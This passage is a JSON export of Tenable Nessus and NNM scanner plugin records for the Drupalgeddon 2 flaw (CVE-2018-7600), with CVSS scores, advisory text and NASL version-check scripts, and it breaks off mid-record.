Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
{"nessus": [{"lastseen": "2023-01-11T14:51:56", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.3.9 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98566", "href": "https://www.tenable.com/plugins/was/98566", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:51", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:32", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:42:31", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.x prior to 8.3.9, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.x < 8.3.9 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700228.PRM", "href": "https://www.tenable.com/plugins/nnm/700228", "sourceData": "Binary data 700228.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.5.x prior to 8.5.1, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700230.PRM", "href": "https://www.tenable.com/plugins/nnm/700230", "sourceData": "Binary data 700230.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.4.x prior to 8.4.6, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700229.PRM", "href": "https://www.tenable.com/plugins/nnm/700229", "sourceData": "Binary data 700229.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:12", "description": "The version of Drupal installed on the remote server is 7.x prior to 7.58, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 